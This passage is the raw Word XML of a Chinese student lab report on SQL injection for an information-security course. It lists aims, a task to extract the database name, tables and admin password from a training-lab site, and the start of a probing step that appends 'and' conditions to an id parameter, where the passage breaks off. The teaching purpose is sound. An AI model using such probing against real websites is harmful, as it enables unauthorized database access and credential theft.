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D06E" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201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信息安全基础》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CEDA09" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00122B8B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92"/>
        <w:gridCol w:w="1837"/>
        <w:gridCol w:w="431"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="767"/>
        <w:gridCol w:w="2956"/>
      </w:tblGrid>
      <w:tr w:rsidR="00122B8B" w14:paraId="4648377B" w14:textId="77777777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2B8F6F73" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42"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38B362FF" w14:textId="0859503C" w:rsidR="00122B8B" w:rsidRDefault="008E5772">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:b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</w:rPr>
              <w:t>陈鹏宇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14:paraId="54E9B0C5" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind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年级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="242F5121" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind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2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="54DB8CF4" w14:textId="77777777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5B853104" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42"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学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FB63D4C" w14:textId="1735911C" w:rsidR="00122B8B" w:rsidRDefault="005459CB">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind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/>
                <w:b/>
              </w:rPr>
              <w:t>20204</w:t>
            </w:r>
            <w:r w:rsidR="008E5772">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:b/>
              </w:rPr>
              <w:t>227</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D5A5418" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind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专业、班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D58DB21" w14:textId="003C5C9B" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind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计算机科学与技术</w:t>
            </w:r>
            <w:r w:rsidR="008E5772">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>班</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="48953964" w14:textId="77777777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5BB522C" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42"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7E4C1A2D" w14:textId="5B72EEB8" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:b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sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:r w:rsidR="0053629E">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>四</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体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3629E" w:rsidRPr="008E5772">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="0053629E" w:rsidRPr="008E5772">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>注入实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="51BB21DE" w14:textId="77777777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1FC793B6" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40"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467A738D" w14:textId="14EDFA17" w:rsidR="00122B8B" w:rsidRDefault="00111201" w:rsidP="008E5772">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40"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2023/</w:t>
            </w:r>
            <w:r w:rsidR="008E5772">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:b/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="0053629E">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="008B2F90">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:b/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62AFB82B" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40"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0A39428F" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40"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DS3402</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="1328DEF2" w14:textId="77777777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130F2B27" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-5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47F7210D" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00122B8B">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:leftChars="-20" w:left="-44" w:right="171" w:firstLineChars="100" w:firstLine="221"/>
              <w:jc w:val="right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EBBDE2A" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:leftChars="-20" w:left="-44" w:right="17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2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3846E76C" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:left="-42" w:right="171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/>
              </w:rPr>
              <w:t xml:space="preserve">验证性  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/>
              </w:rPr>
              <w:t xml:space="preserve">设计性  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□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>综合性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="2E25A28C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="324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1FDB30C" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51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教师评价：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CCA91A1" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="OLE_LINK56"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK55"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK30"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK49"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK29"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK37"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK53"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK64"/>
            <w:bookmarkStart w:id="8" w:name="OLE_LINK20"/>
            <w:bookmarkStart w:id="9" w:name="OLE_LINK57"/>
            <w:bookmarkStart w:id="10" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="11" w:name="OLE_LINK47"/>
            <w:bookmarkStart w:id="12" w:name="OLE_LINK9"/>
            <w:bookmarkStart w:id="13" w:name="OLE_LINK59"/>
            <w:bookmarkStart w:id="14" w:name="OLE_LINK21"/>
            <w:bookmarkStart w:id="15" w:name="OLE_LINK43"/>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="17" w:name="OLE_LINK46"/>
            <w:bookmarkStart w:id="18" w:name="OLE_LINK44"/>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK54"/>
            <w:bookmarkStart w:id="20" w:name="OLE_LINK10"/>
            <w:bookmarkStart w:id="21" w:name="OLE_LINK31"/>
            <w:bookmarkStart w:id="22" w:name="OLE_LINK41"/>
            <w:bookmarkStart w:id="23" w:name="OLE_LINK58"/>
            <w:bookmarkStart w:id="24" w:name="OLE_LINK48"/>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK65"/>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK27"/>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK45"/>
            <w:bookmarkStart w:id="28" w:name="OLE_LINK60"/>
            <w:bookmarkStart w:id="29" w:name="OLE_LINK63"/>
            <w:bookmarkStart w:id="30" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="31" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="32" w:name="OLE_LINK40"/>
            <w:bookmarkStart w:id="33" w:name="OLE_LINK6"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>□算法/实验过程正确； □源程序/实验内容提交  □程序结构/实验步骤合理；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22417ECB" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51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□实验结果正确；      □语法、语义正确；     □报告规范；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       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45A9F927" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51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 xml:space="preserve">评语：                           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C82AFB" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51" w:firstLineChars="150" w:firstLine="33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 xml:space="preserve">                             评价教师签名（电子签名）：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黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="02F01BB4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1841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4D993A5" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRPr="008D0788" w:rsidRDefault="00111201">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0788">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>一、实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1BFAB7" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="0053629E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1</w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>学习并掌握SQL注入的基本原理和方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28ACA985" w14:textId="28403401" w:rsidR="00122B8B" w:rsidRPr="008D0788" w:rsidRDefault="0053629E" w:rsidP="0053629E">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="440"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>学习SQL注入的防范措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="296D3A45" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="163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0636756" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRPr="008D0788" w:rsidRDefault="00111201">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0788">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>二、实验项目内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C9509D" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="0053629E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1</w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检索SQL注入相关资料，自学SQL注入基本方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CA2B7AD" w14:textId="3EB73C16" w:rsidR="00122B8B" w:rsidRPr="008D0788" w:rsidRDefault="0053629E" w:rsidP="0053629E">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="440"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28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2</w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>完成对特定网站的SQL注入以获取数据库信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="26BB2F61" w14:textId="77777777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E613B69" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"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Cs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>三、</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>实验设计</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="751CF45C" w14:textId="72D76DC5" w:rsidR="008D0788" w:rsidRPr="0069784F" w:rsidRDefault="008D0788" w:rsidP="008D0788">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="440"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000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任何SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>交互时</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，</w:t>
            </w:r>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04427E04" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr>
              <w:ind w:firstLine="560"/>
              <w:jc w:val="both"/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对以下网站进行SQL注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E9188D" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr>
              <w:ind w:firstLine="560"/>
              <w:jc w:val="both"/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/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A5F9C6F" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr>
              <w:ind w:firstLine="560"/>
              <w:jc w:val="both"/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完成以下信息的获取：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2101258B" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr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数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440A0975" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr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数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50199DAD" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr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每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C2DD54" w14:textId="77777777" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr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管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3771E06B" w14:textId="15E69151" w:rsidR="00122B8B" w:rsidRPr="0053629E" w:rsidRDefault="0053629E" w:rsidP="008D0788">
            <w:pPr>
              <w:ind w:firstLine="560"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="32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最后总结如何对SQL注入攻击进行防范。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="7D2A294A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="12228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C757A64" w14:textId="110A2925" w:rsidR="0053629E" w:rsidRDefault="00111201" w:rsidP="0053629E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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lastRenderedPageBreak/>
              <w:t>四、实验过程</w:t>
            </w:r>
            <w:r w:rsidRPr="0053629E">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>或算</w:t>
            </w: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法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592465B8" w14:textId="77777777" w:rsidR="00106BAC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本次实验主要根据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE656A7" w14:textId="77777777" w:rsidR="00106BAC" w:rsidRDefault="00106BAC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hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidRPr="00033CDA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://www.modb.pro/db/62905</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1EA5705D" w14:textId="77777777" w:rsidR="00106BAC" w:rsidRDefault="00106BAC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rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625BE221" w14:textId="53EAF528" w:rsidR="00106BAC" w:rsidRDefault="00106BAC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hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidRPr="00033CDA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://www.cnblogs.com/hirak0/p/15539022.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4DD930A8" w14:textId="042A35BA" w:rsidR="0069784F" w:rsidRPr="0069784F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进行学习。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1185B5C6" w14:textId="608D464B" w:rsidR="0053629E" w:rsidRPr="0069784F" w:rsidRDefault="0053629E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1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 xml:space="preserve">. </w:t>
            </w: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寻找漏洞</w:t>
            </w:r>
            <w:r w:rsidR="00D27216" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3347696E" w14:textId="2D2CB9D1" w:rsidR="009A4425" w:rsidRPr="0069784F" w:rsidRDefault="0053629E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观察U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>RL</w:t>
            </w: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：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>http://pu2lh35s.ia.aqlab.cn/index.php?id=1，尝试将</w:t>
            </w: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 xml:space="preserve"> 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 xml:space="preserve">id=1 </w:t>
            </w:r>
            <w:r w:rsidR="008A3086" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>后面</w:t>
            </w:r>
            <w:r w:rsidR="009A4425" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>分别</w:t>
            </w:r>
            <w:r w:rsidR="008A3086" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>加上 and</w:t>
            </w:r>
